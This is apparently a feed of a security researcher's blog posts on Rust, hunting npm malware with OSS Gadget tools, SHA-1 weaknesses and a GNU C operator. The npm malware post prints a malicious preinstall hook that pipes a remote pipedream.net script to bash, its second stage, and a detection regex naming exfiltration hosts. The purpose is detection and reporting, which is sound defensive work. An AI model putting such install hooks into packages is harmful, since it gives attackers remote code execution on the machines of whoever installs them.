DEV Community: Michael Scovetta

Learning Rust in 2023

Michael Scovetta — Fri, 23 Dec 2022 18:16:32 +0000

Another year passes where I've started to learn Rust, but didn't quite get over to the "and now I feel productive" part of the curve.

Fortunately, Google just published a four-day course called Comprehensive Rust, which has received a bit of notice recently.

Combined with the Rust Book, I plan to spend a few weeks in early 2023 to get this off my to-do list and onto my to-done list.

Are there other terrific resources for learning Rust out there that folks know about?

Hunting for malware in npm

Michael Scovetta — Thu, 22 Dec 2022 00:55:03 +0000

I've spent the past two years or so hunting for malware in open source ecosystems (mostly npm and PyPI, but a bit in the others too). We've found and reported over 20,000 instances in that time, and while we're certainly not the only group to be doing this work, I'm proud of how quickly we're able to detect and report.

In this post, I wanted to share some details about how I discover these and what I do about them. I'm only going to talk about one specific malware type, which is among the most basic. There have been previous write-ups about these, so there's nothing "new" in this post that you can't learn elsewhere.

How Malware Executes

When you install a package from npm, the package has an opportunity to run "preinstall" scripts. These are arbitrary commands, defined in package.json, that run either before, during, or after installation. (There are a few others; check out the docs for more information.)

Since these preinstall scripts can do pretty much anything, they're a simple source for malware. Attackers can exfiltrate data, install other packages, make changes to your system, or anything else that the user running the script would be able to do, including connecting to other network endpoints.

Detecting Preinstall Malware

The simplest way to detect this type of malware is to look for it in package.json files. You can download the package (being careful not to install it -- oss-download can be helpful here) and then use jq or another command to search for commands in the file.

Case Study: pkg:npm/reactjs-slick

For this post, we're going to explore the reactjs-slick module, which was posted a few hours ago.

# oss-download -e pkg:npm/reactjs-slick

   ____   _____ _____    _____           _            _
  / __ \ / ____/ ____|  / ____|         | |          | |
 | |  | | (___| (___   | |  __  __ _  __| | __ _  ___| |_
 | |  | |\___ \\___ \  | | |_ |/ _` |/ _` |/ _` |/ _ \ __|
 | |__| |____) |___) | | |__| | (_| | (_| | (_| |  __/ |_
  \____/|_____/_____/   \_____|\__,_|\__,_|\__, |\___|\__|
                                            __/ |
                                           |___/          
OSS Gadget - oss-download 0.1.357+c946c93324 - github.com/Microsoft/OSSGadget
INFO  - Downloaded pkg:npm/reactjs-slick to /tmp/t/npm-reactjs-slick@2.0.2

# find . -name package.json | xargs jq .scripts.preinstall                                                                                                                                                      
"curl https://d621fdf07c471f049aba6ce202295bea.m.pipedream.net | bash"

So here, we're seeing that when the reactjs-slick module is installed, the curl command is used to download a command from that long URL and pass it to bash.

This is effectively a reverse shell, allowing the attacker to run arbitrary commands on your system.

If we load that URL (being very careful), we see it ends up running this command:

watch -n 10 'curl https://3513c0f0392eb1c8690450709ee37093.m.pipedream.net | bash'; node index.js;

So every 10 seconds, that other URL is loaded and executed:

touch /tmp/redparsecdhackediwasheredone

OSS Gadget: oss-detect-backdoor

My team and I packaged up a bunch of suspicious patterns into a tool, part of the OSS Gadget suite. You can use this to automatically download and scan for interesting patterns. In this case of the reactjs-slick module, we detect it easily:

# oss-detect-backdoor pkg:npm/reactjs-slick

   ____   _____ _____    _____           _            _
  / __ \ / ____/ ____|  / ____|         | |          | |
 | |  | | (___| (___   | |  __  __ _  __| | __ _  ___| |_
 | |  | |\___ \\___ \  | | |_ |/ _` |/ _` |/ _` |/ _ \ __|
 | |__| |____) |___) | | |__| | (_| | (_| | (_| |  __/ |_
  \____/|_____/_____/   \_____|\__,_|\__,_|\__, |\___|\__|
                                            __/ |
                                           |___/          
OSS Gadget - oss-detect-backdoor 0.1.365+570ffa6632 - github.com/Microsoft/OSSGadget
--[ Match #1 of 7 ]--
   Rule Id: BD001002
       Tag: Security.DependencyConfusion.AttackPattern.SuspiciousHostname
  Severity: Critical, Confidence: High
  Filename: /npm-reactjs-slick@2.0/package/index.js
   Pattern: .{1,45}\.(pipedream\.net|ceye\.io|burpcollaborator\.net|interact\.sh|requestbin\.net|nmnfbb\.com)
  | });
  | 
  | var options = {
  |     hostname: "d621fdf07c471f049aba6ce202295bea.m.pipedream.net", //replace burpcollaborator.net wit
  |     port: 443,
  |     path: "/",
  |     method: "POST",
  |

Attacker or Security Researcher?

In many cases, the "attacker" is a security researcher, doing this either as part of a penetration test or to demonstrate an attack's effectiveness.

In this case, the module was published by someone with a few others, that all appear to be similar ("r3dpars3c was doing pentest here").

Of course, nothing stops an actual attacker from writing the same thing, so I don't differentiate between what I believe to be a real attack and a simulated one.

Reporting the Module

We can easily report these types of modules. Within npm, you can click on the "Report malware" button on the right side of the module's page.

In this particular case, the author's other packages had similar malware, so we reported all four to the npm security team, and all have since been removed from the registry.

OSS Gadget: Using oss-download

Michael Scovetta — Wed, 21 Dec 2022 06:36:27 +0000

As a security researcher, I often find myself downloading packages (rather than installing them). This is often harder than it should be, either requiring specific ecosystem-specific tools like npm or pip, or searching through websites like https://repo1.maven.org.

As a developer, I loathe repeating myself, so a few years ago, my team and I started building a collection of tools we call OSS Gadget. It simplifies and automates various task that we've needed to perform, and thought it would help others too.

OSS Gadget includes tools to help you download and extract packages, identify malware or cryptography, extract interesting characteristics, detect typo-squatting, and various other things.

In this post, I wanted to share the oss-download tool, which as the name suggests, helps you download and optionally extract packages from a wide variety of package ecosystems.

The oss-download tool operates on a Package URL, which is a convenient way to express an ecosystem, package, and version. For example, the Python Django package would be pkg:pypi/django, and version 4.1.4 of Django would be pkg:pypi/django@4.1.4.

To download Django 4.1.4, just run:

# oss-download pkg:pypi/django@4.1.4

   ____   _____ _____    _____           _            _
  / __ \ / ____/ ____|  / ____|         | |          | |
 | |  | | (___| (___   | |  __  __ _  __| | __ _  ___| |_
 | |  | |\___ \\___ \  | | |_ |/ _` |/ _` |/ _` |/ _ \ __|
 | |__| |____) |___) | | |__| | (_| | (_| | (_| |  __/ |_
  \____/|_____/_____/   \_____|\__,_|\__,_|\__, |\___|\__|
                                            __/ |
                                           |___/          
OSS Gadget - oss-download 0.1.365+570ffa6632 - github.com/Microsoft/OSSGadget
INFO  - Downloaded pkg:pypi/django@4.1.4 to /usr/src/app/pypi-bdist_wheel-django@4.1.4.whl
INFO  - Downloaded pkg:pypi/django@4.1.4 to /usr/src/app/pypi-sdist-django@4.1.4.tar.gz

If you'd like to automatically extract the contents of the packages (recursively), use the -e option:

# oss-download -e pkg:pypi/django@4.1.4

You can also download all version of a package by simply using a * as the version:

# oss-download pkg:pypi/django@*

OSS Gadget supports Cargo, Cocoapods, Composer, CPAN, CRAN, RubyGems, Go, GitHub, Hackage, Maven, npm, NuGet, PyPI, Ubutnu, and the Visual Studio Marketplace.

We hope OSS Gadget is useful; if you run into any trouble, please open an issue.

Broken Hash Functions

Michael Scovetta — Wed, 21 Dec 2022 04:41:39 +0000

This is a post about cryptography, but not "crypto". There will be no talk of NTFs, the latest meltdowns, or wallets of any sort.

Instead, I wanted to talk briefly about the state of broken hash functions. SHA-1 was in the news last week, with NIST finally declaring it "end of life", suggesting it be phased out by early 2031.

Now this shouldn't be news to anyone in the security community. We've known SHA-1 was fundamentally broken since 2005, and reminded again in 2017 with the SHAttered attack.

But what does "broken" really mean? Is SHA-1 dangerous in all cases, or just some? Is is just something that cryptographers and security people get worked up about, or is it actually something that regular developers need to care about?

Well, in my opinion, it's a little from column 'A' and a little from column 'B'.

But let's get this out of the way up front: Don't use SHA-1. Use SHA-256, SHA-512, or SHA-3. Don't use exotic hash functions or try to roll your own. If you see MD5, turn around and walk the other way. If you're storing passwords, you'll need to do something else too (more on that later).

Now, the attacks against SHA-1 break the "collision resistance" property of cryptographic hash functions. Collision resistance means that it should be really, really hard for anyone to find two different input strings that have the same hash value. We define "really, really hard" to mean, "you might as well just search all inputs, one by one, until you find one by chance" -- or "brute force".

SHA-1 has 160 bits of output, which means 80 bits of collision resistance (due to the Birthday Paradox). This means you should have to try (roughly) 2⁸⁰ guesses before you find two strings that have the same hash value. In practice, researchers have been able to get that down to around 2⁶¹, or around 500,000 times faster than brute force.

But collision resistance is just one of a few properties that hash functions have. The other important one is called "pre-image resistance". This one is about, "if you give me a hash output, can I find an input string that would generate it?". SHA-1 maintains pre-image resistance, and shows no visible signs of weakness.

Does this mean SHA-1 is safe to use?

The truth is, "it depends". If you're a cryptographer, you're certainly capable to determining whether a particular use of a hash function demands pre-image resistance, collision resistance, or both. But you're probably not a cryptographer, and as much as it may bruise your ego, you're probably not equipped to make this call. Sorry.

Can I still store passwords as hashed SHA-1?

Absolutely not! This was a terrible idea back in 1995, and is still a terrible idea. But it's not at all about weaknesses in SHA-1 -- instead, it's easy to just "hash all of the passwords" through SHA-1, or SHA-512, or SHA-3, or whatever, and compare to the list retrieved from your database. Instead, you need to use some combination of salt, pepper, iterated hashing, encryption, and memory-hard algorithms to ensure that an attacker with a database dump can't learn anything interesting.

C's Ternary Operator

Michael Scovetta — Wed, 21 Dec 2022 03:34:31 +0000

I first learned to program in C when I was 14 or 15, and in the decades since, I've used the ternary operator often enough. It's convenient in cases like:

#include <stdio.h>
#include <stdlib.h>

int main() {
  bool is_admin = check_admin();
  set_level(is_admin ? 999 : 1);
  return 0;
}

The ternary operator works the same if you had written:

#include <stdio.h>
#include <stdlib.h>

int main() {
  bool is_admin = check_admin();
  if (is_admin) {
    set_level(999);
  } else {
    set_level(1);
  }
  return 0;
}

I came across another form of this operator, which I don't recall ever seeing before, and wanted to share. As it turns out, this is a GNU extension. You can omit the statement between the ? and the : entirely, and the operator changes a bit, returning either the value before the operator if it isn't false, null, or zero, or the value after it otherwise.

#include <stdio.h>
#include <stdlib.h>

int main() {
  char* temp_dir = getenv("TEMPDIR") ?:
                   getenv("TMPDIR") ?:
                   getenv("TEMP") ?:
                   "/tmp";
  printf("Temp dir is: %s", temp_dir);
  return 0;
}

This is essentially the same as:

#include <stdio.h>
#include <stdlib.h>

int main() {
  char* temp_dir = getenv("TEMPDIR");
  if (temp_dir == NULL)
    temp_dir = getenv("TMPDIR");
  if (temp_dir == NULL)
    temp_dir = getenv("TEMP");
  if (temp_dir == null)
    temp_dir = "/tmp";

  printf("Temp dir is: %s", temp_dir);
  return 0;
}

This is usually called a null-coalescing operator, and exists in other languages too, like JavaScript and C#.